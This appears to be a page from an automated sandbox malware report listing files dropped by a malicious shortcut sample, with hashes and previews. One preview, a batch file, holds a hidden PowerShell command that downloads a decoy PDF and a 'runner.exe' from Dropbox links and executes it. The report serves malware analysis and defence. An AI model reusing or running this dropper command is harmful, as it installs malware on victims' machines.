                                                                                                                                                                                                                                                                                                      SHA1:F74A768C54B5067995B0518A0107A834B1B4665B
                                                                                                                                                                                                                                                                                                      SHA-256:42458188732FFAD7AC8223445549DFD5A1B5DFDC48BDDB5DDD1286A22040EFE9
                                                                                                                                                                                                                                                                                                      SHA-512:1F906F926779A1DF22DD3D5C6ED3F92D4F3D7B5AE3C8DF0C21AD094868A1C7DD5C4C5C4B57A1161F5FC6EEF7F9BC3957E9DF2CD250F0ACAD837C359E54B3708E
                                                                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 55%
                                                                                                                                                                                                                                                                                                      Joe Sandbox View:
                                                                                                                                                                                                                                                                                                      • Filename: taCCGTk8n1.lnk, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.................z..............z........#.............................Rich..................PE..L......C.....................`....................@...........................6.....Y.$..............................................."..............................................................................................................text............................... ..`.rdata...|..........................@..@.data....)...P.......P..............@....rsrc........."......0..............@..@................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\1902382389.pdf

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                      File Type:PDF document, version 1.7, 2 pages
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):106848
                                                                                                                                                                                                                                                                                                      Entropy (8bit):7.916846950395155
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:1536:/t7dsAjcYfnYKHqU4UDgCWuJhG/oEMKTKipqgdrP9sW32prNybV0MLQF2C/hy1T:lGY1YUPDgK6TlrPTsSVC/h8
                                                                                                                                                                                                                                                                                                      MD5:14E5098503C76B02728CDE6EA96538C3
                                                                                                                                                                                                                                                                                                      SHA1:88B84351C73D8E918BEA3DD7EB2178B9C466A342
                                                                                                                                                                                                                                                                                                      SHA-256:7519554506D088A93C531F74F055E8966215CCC42C647382F6A95705172DCAFF
                                                                                                                                                                                                                                                                                                      SHA-512:F8A88B3E86503F4422F599A279EBC8C9F3B552AC3F7495C92780FFE2B406FD1F2F855F0B47D1D0F543E058E90E7146A54ABF86B611FE4F071F46ECE6927D6087
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:%PDF-1.7..%......1 0 obj..<</Type/Catalog/Pages 2 0 R/Lang(en) /StructTreeRoot 25 0 R/MarkInfo<</Marked true>>/Metadata 85 0 R/ViewerPreferences 86 0 R>>..endobj..2 0 obj..<</Type/Pages/Count 2/Kids[ 3 0 R 20 0 R] >>..endobj..3 0 obj..<</Type/Page/Parent 2 0 R/Resources<</Font<</F1 5 0 R/F2 9 0 R/F3 11 0 R/F4 16 0 R>>/ExtGState<</GS7 7 0 R/GS8 8 0 R>>/XObject<</Image18 18 0 R/Image19 19 0 R>>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI] >>/MediaBox[ 0 0 612 792] /Contents 4 0 R/Group<</Type/Group/S/Transparency/CS/DeviceRGB>>/Tabs/S/StructParents 0>>..endobj..4 0 obj..<</Filter/FlateDecode/Length 2726>>..stream..x..[Y..F.~.`.C.EZH4....0G.8k....Y`.....0.H..g'.~..I.C.Wk..G..&....l.7..`WWo...g..wI.`...~z.__...;.....|./..,..0..../~..+./n?^^...3..q~y.a..8S".4g..=.wV0..-jx![.......Fl.o......u...`?..cl. w.0../...T..pup..b....9...x.F.r<.......Q._.........%^...G.Y`1GR.....C)7.X...j..X..f.8.e2......4.Uy.C...c<...L@S.+..,&.01........#.....0...q...Pz.......G..#.......+.p..."..K8..B....

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\2b874809-156b-496e-a06b-7b702893f0f2.tmp

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 135363
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):76326
                                                                                                                                                                                                                                                                                                      Entropy (8bit):7.9961120748813075
                                                                                                                                                                                                                                                                                                      Encrypted:true
                                                                                                                                                                                                                                                                                                      SSDEEP:1536:hS5Vvm808scZeEzFrSpzBUl4MZIGM/iysAGz8vBBrYunau6wp:GdS8scZNzFrMa4M+lKqeu/nr
                                                                                                                                                                                                                                                                                                      MD5:01E352D35675990A139199DD86B38AAC
                                                                                                                                                                                                                                                                                                      SHA1:E16163C81E5F36B3B819AA0A63BFA63D88548A91
                                                                                                                                                                                                                                                                                                      SHA-256:148CDE42D38C62C1A1E8B8D3D4BD8830F0F8C2DC684E3C59B0A510E31011CA4A
                                                                                                                                                                                                                                                                                                      SHA-512:75A58FFAD6E3E0546268CC863AE382B5429795D8BCED64BAE2D06BCEEB6C2E37BD656A3E335EB61B521888B76913F2D0281F8C9C081FF8637307AE5934D98C8B
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:...........m{..(.}...7.\...N.D*.w..m..q....%XfL.*I.ql..;/.....s...E...0....`..A..[o^.^Y...F_.'.*.."L...^.......Y..W..l...E0..YY...:.&.u?....J..U<.q."...p.ib:.g.*.^.q.mr.....^&.{.E.....,EAp.q.......=.=.....z^.,d.^..J.R..zI4..2b?.-D5/.^...+.G..Y..?5..k........i.,.T#........_DV....P..d2......b\..L....o....Z.}../....CU.$.-..D9`..~......=....._.2O..?....b.{...7IY.L..q....K....T..5m.d.s.4.^... ..~<..7~6OS..b...^>.......s..n....k."..G.....L...z.U...... ... .ZY...,...kU1..N...(..V.r\$..s...X.It...x.mr..W....g........9DQR....*d......;L.S.....G... .._D.{.=.zI.g.Y~...`T..p.yO..4......8$..v.J..I.%..._.d.[..du5._._...?\..8.c.....U...fy.t....q.t....T@.......:zu..\,.!.I..AN_.....FeX..h.c.i.W.......(.....Y..F...R%.\..@.. 2(e,&.76..F+...l.t.$..`...........Wi.{.U.&(.b}...}.i..,...k....!..%...&.c..D-."..SQ.......q9....)j....7.".N....AX...).d./giR....uk.....s.....^...........:...~......(hP..K.@.&..?.E0:+D|9...U.q.cu..)t{.e...X...{.....z......LL&I6.=.

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\78c57c0e-febe-4895-8519-b5202c6044d9.tmp

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:Google Chrome extension, version 3
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):11185
                                                                                                                                                                                                                                                                                                      Entropy (8bit):7.951995436832936
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:192:YEKh1jNlwQbamjq6Bcykrs3kAVg55GzVQM5F+XwsxNv7/lsoltBq0WG4ZeJTmrRb:fKT/BAzA05Gn5F+XV7NNltrWG4kJTm1b
                                                                                                                                                                                                                                                                                                      MD5:78E47DDA17341BED7BE45DCCFD89AC87
                                                                                                                                                                                                                                                                                                      SHA1:1AFDE30E46997452D11E4A2ADBBF35CCE7A1404F
                                                                                                                                                                                                                                                                                                      SHA-256:67D161098BE68CD24FEBC0C7B48F515F199DDA72F20AE3BBB97FCF2542BB0550
                                                                                                                                                                                                                                                                                                      SHA-512:9574A66D3756540479DC955C4057144283E09CAE11CE11EBCE801053BB48E536E67DC823B91895A9E3EE8D3CB27C065D5E9030C39A26CBF3F201348385B418A5
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:Cr24..............0.."0...*.H.............0.........N.......E#......9e.u.q...VYY..@.+.C..k.O..bK.`..6.G..%.....3Z...e _.6....F..1p..K.Z......./ .3...OT..`..0...Y...FT..43.th.y...}....p.L...2S.&i.`..o...f.oH.....N..:..ijT.3.F{.0.,.f?'f.CQt;b_"Pc.. ..~S.I.c.8Z.;.....{G.a......k...>.`.o..%.$>;.....g.............jg?.R..@.:..........&..{...x@.Py..;kT....%F".S..w...N....9...A..@X.t!i.@..1;......1E..X.....[.~$....J......;=T.;)k..Y...$......S......M.P..P..>..=..u.....2p...w.9..1qw.a\A..Vj .C.....A..Cf1.r6.A...L. _m...[..l.Wr_../.. .B..9!.!+..ZG.K.......0.."0...*.H.............0.........^SUd%Q.L].......Cl2o...\[.....'*...;R=....N.C5....d. .....J.C>u.kr..Y..syJC.XS.q..E.n?....(G.5..)2.G..!.M.SS.{..U....!.EE..M[.#qs.A.1...g)nQ.c..G....Bd..7... .O.BI..KXQ..4.d.K.0......g.....-p....Z.E{...M&.~n.TE7..{0....5.#.C+3.y)pd9.e.........@..3.9..B.....I....2nX........2.?.~..S....]G.N.....Lr.O.Ve....9..D1.G..W)...P.?=.#..7.R.lz..a.wX.e..h.h.~....v..RP.@X....d.G

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\836808032.bat

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                      File Type:DOS batch file, ASCII text, with very long lines (459), with CRLF line terminators
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):519
                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.5470282107182305
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:12:0G81kFX0b11JktZM9kaMBfH1MRdEFvtyJk4pUrXB42Wgn:0GpObJIZdF+YCJV2R42WQ
                                                                                                                                                                                                                                                                                                      MD5:17ECE0B40E0D30E590955D79B4DE9541
                                                                                                                                                                                                                                                                                                      SHA1:673913590C7BD10E084EC3E3AC49E2176CFBA2BC
                                                                                                                                                                                                                                                                                                      SHA-256:2D3151F761001EE38041D5B55EF6E3CC19E76B688BC42A9648D6F64A326DC063
                                                                                                                                                                                                                                                                                                      SHA-512:9F272836BD4C4E30D07FD51A1DA27187C070655A4F037ED7828DB11EFCD1FD7D82CAFF2163DA8FB505BA36E27E22D5728422AF12D497ABFC43AE131B59203C47
                                                                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                                                                      Preview:@echo off..powershell -WindowStyle Hidden -Command ^.. "$RandomPDF = \"$env:temp\$(Get-Random).pdf\"; $RandomEXE = \"$env:temp\$(Get-Random).exe\"; IWR -Uri 'https://www.dropbox.com/scl/fi/dgiur64vawmdx9alqw6et/Lewis-Silkin-LLP.pdf?rlkey=kduhqrnp00rj44rjeppuw31qk&dl=1' -OutFile $RandomPDF ; Start-Process msedge.exe -ArgumentList \"--kiosk $RandomPDF\" ; IWR -Uri 'https://www.dropbox.com/scl/fi/qzqf3fr40w71dq8uwcnec/runner.exe?rlkey=dfl8hxamjpp5zdy8yzn5ejrol&dl=1' -OutFile $RandomEXE ; start $RandomEXE"..exit

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_aqlwolvw.xyf.ps1

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bsqbj4ke.0y0.psm1

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ips34dix.ewh.ps1

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jhopxos0.31u.psm1

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_k5y5jhos.xac.ps1

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tqu4k52m.njn.psm1

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\a6642f66-cf0d-468c-a987-27675c7eeff0.tmp

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 1366x720, components 3
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):206855
                                                                                                                                                                                                                                                                                                      Entropy (8bit):7.983991878155761
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:3072:5WcDW3D2an0GMJGqJCj+1ZxdmdopHjHTFYPQyairiVoo4XSWrPoiXvJddppWmEIx:l81Lel7E6lEMVo/S01fDpWmEgr
                                                                                                                                                                                                                                                                                                      MD5:03E0A41C7EF64C946D818C2F5E4B7EC3
                                                                                                                                                                                                                                                                                                      SHA1:B3FEB76961D6A54EB9566EAC7E688BC55394B672
                                                                                                                                                                                                                                                                                                      SHA-256:CA2E03394F3B161D3A1E25F6A77B28EFDAB1D7989A0A1C2B6FC1764D8C27B7C7
                                                                                                                                                                                                                                                                                                      SHA-512:3F775790206CADE3A9CFBDCC3C081611330D525222D43085749A98D975B779109DF305799C53386E4B251D1D892735F5B4B31E6CD95475D0606BDD13BDB24001
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:......Exif..II*.................Ducky.......2......Adobe.d...........................................................#"""#''''''''''..................................................!! !!''''''''''........V.."....................................................................................!1..AQ..aq."2....R..T....Br.#S.U..b..3Cs...t6.c.$D.5uV...4d.E&....%F......................!1..AQaq....."2......BRbr3CS....#..4.............?......1f.n..T......TP....E...........P.....@.........E..@......E.P........@........E.....P.P..A@@.E..@.P.P..AP.P..AP..@....T..AP.E..P.Z .. ....."... .....7.H...w.....t.....T....M.."... P..n.n..t5..*B.P..*(.................*.....................( ..................*.. .".... .".......(.. .".....*.. ....o......E.6... ..*..."........."J......Ah......@.@@....:@{6..wCp..3...((.(......................*...@..(...."....................*......*.. ........T.......@.@@........AP.P..@.E@....E@.d.E@.@@..@.P.T..@..@..P.D...@M........EO..."...=.wCp.....R......P.@......

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\ab63a4cc-dca5-4ba1-a5f1-ed9c53230aef.tmp

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:PNG image data, 204 x 264, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):437259
                                                                                                                                                                                                                                                                                                      Entropy (8bit):7.998726360451669
                                                                                                                                                                                                                                                                                                      Encrypted:true
                                                                                                                                                                                                                                                                                                      SSDEEP:12288:r0Ti9JPNfgBTIxXL2v6YRl5JCqqpRFW0X2yk:us1IBTI9LkhSqqQ0Xq
                                                                                                                                                                                                                                                                                                      MD5:D14135E953CC12D6CE5AB9529108AB12
                                                                                                                                                                                                                                                                                                      SHA1:A3CA22055B2864F479A137CFDA856009AEB693A7
                                                                                                                                                                                                                                                                                                      SHA-256:91D3663C9ED02759863A7B0D7BB909BC09C172FB698CA65F01C4624A8E09DF46
                                                                                                                                                                                                                                                                                                      SHA-512:9155BC046699A5B69424D2E1CD9AD00447C02E5CEC1377C8DAE592CB2639C1495FE0217FD906666FAF2D2D29F7FC27A2CA52DEC72B9A04D06DEBFC29F9C1C059
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:.PNG........IHDR..............,......sRGB.........IDATx^..g.mE...`....f..A....Q......U~....;..e...A.T..%.. ..s.....=..u.9...gWM..9k....zzw.^.{..n..)G........l.S.B...`..!P ...`.4."..@...D0.X1...&>.....L.VLC ....@.@.S.....`..!P ...`.4."..@...D0.X1...&>.....L.VLC ....@.@.S.....`..!P ...`.4."..@...D0.X1...&>.....L.VLC ....@..J.....{..7.9.r.-....../}................g>s...K......G..n...._NW]u....<fr......#......O...?....n...M7.4...?.....9.....gl....MO|..[.W_}....O..W.2=.....?..u. ...g..<.9..|.....?......lz...f....+...9...t...w.{..(.k]X...7..~.Lw....'=.I...yf..........7.<=..O..p.;.l...7._...-..~........l.R.......}.U..........=...........U.Q=....~...4...~......\...Mx..zk...|d.M..........<..'m..^E;Ge_{.....g..C...........k.p..y8.'`w........?.yz.....t.E.5g..........U.8...&.+..bz...8..~...\..w.KK...=......&....~.-.M.~....L..x.....h:..Z...+.~...O1.F>.9...nhy..=....p..--.u.Y..>..f.....].w......}&=..\.z=iH...c.=v........k....V.....'........

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\ad2b1d09-0f4c-4d55-97f0-6b017c6250df.tmp

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:very short file (no magic)
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):1
                                                                                                                                                                                                                                                                                                      Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:3:L:L
                                                                                                                                                                                                                                                                                                      MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                                                                                                                                                      SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                                                                                                                                                      SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                                                                                                                                                      SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:.

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\bdd9f734-2aa0-4d40-9d58-2cd1731e9182.tmp

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 276634
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):263704
                                                                                                                                                                                                                                                                                                      Entropy (8bit):7.998774950072608
                                                                                                                                                                                                                                                                                                      Encrypted:true
                                                                                                                                                                                                                                                                                                      SSDEEP:6144:vj1QHfvuVtTT0bCnop1MIPG4y9XgcbKdhRuQRhzb6d0X7ayNC:vjq/GGCnorP0952dPuQRFW0X2yk
                                                                                                                                                                                                                                                                                                      MD5:EF6DB67B82032D675EA4E61A73D3C358
                                                                                                                                                                                                                                                                                                      SHA1:882A4CF2944FC8E27F435890DF647177AD167CB0
                                                                                                                                                                                                                                                                                                      SHA-256:97C885F4390FFAE57EF240B46E113A0DFF637A003B6AD54031A1AA6809956276
                                                                                                                                                                                                                                                                                                      SHA-512:B41B3CD76F50964CD4FA0AB18BEB785FA592CB92045B3455D238799A1167CB5190EB1C7E0216E1E874AA03A8686025A6B366926023C9C56834B92B4F612D0A18
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:............ko..q?....Am..0.<.M...e.B,[......|J..............x..8. .w73;;;;....L.....La.k&.k..........~...#..........%.Y.>}.j~.O.r..L....R.`..w......ta.'.....~:.9.'C...|..Gt...'..y..?...}..........,....1?..)QX....tgpgN.`..~...'.h.3^.s..UT...~o..R.].4^..V8"JwfnH...%..........i.qmG4.1@....a....\.i.C..Rq9.h....\..j...u..O..O.5!.}x....%j..}CW+.*..jaA.......-...*....P?..vA3+iU...N...%...x.E.8.Z..2HQw._.H8........+Lw].wL..........tc..l.+p..7..<).......Z.!..!i......?./.P9.y..;....,..C.K.....~.0........E...n..(..&.X...na-c.6.....Q.[.p.IO....[...W$....l7J.,..=EK.3Y...R...|..z_i.q......./.......[..5..qE.....FM+..VRB...r9!{3.....!...;.,{..}.sP..m..f.....~..2J..4.+..i6M...EW..ON..N.........4...T...j...1:..E=..<....Y..w.MV.....w.q.{...Y.....J...@.W..i.Sm;..0.1......./.4..b.wPbK.yeZ@.I...0.C.TZ$...-.+.[*......w.qG..}B^........n....#.........Y4.g4.....(.K..e..q7[.{..W....,%...z.^N...[/?......).9/?...r].oM2.'G.gu..Q|..._+......1^...9......-.j2lae..+!3

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\cv_debug.log

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):1420
                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.420448181641701
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:24:YK0bl5r75riCe0qW+5Ua02EHP5IKL0jZ5JwbX/B+L0Bp1J5ip0BbJ5M:YK0bl5r75riN0qW+5Ua02sP5IKL0jZ5J
                                                                                                                                                                                                                                                                                                      MD5:59F86A79869620A17AA5F97B447D8909
                                                                                                                                                                                                                                                                                                      SHA1:2E7DEFFA40E33FEC025DD1C235491C2C7372708A
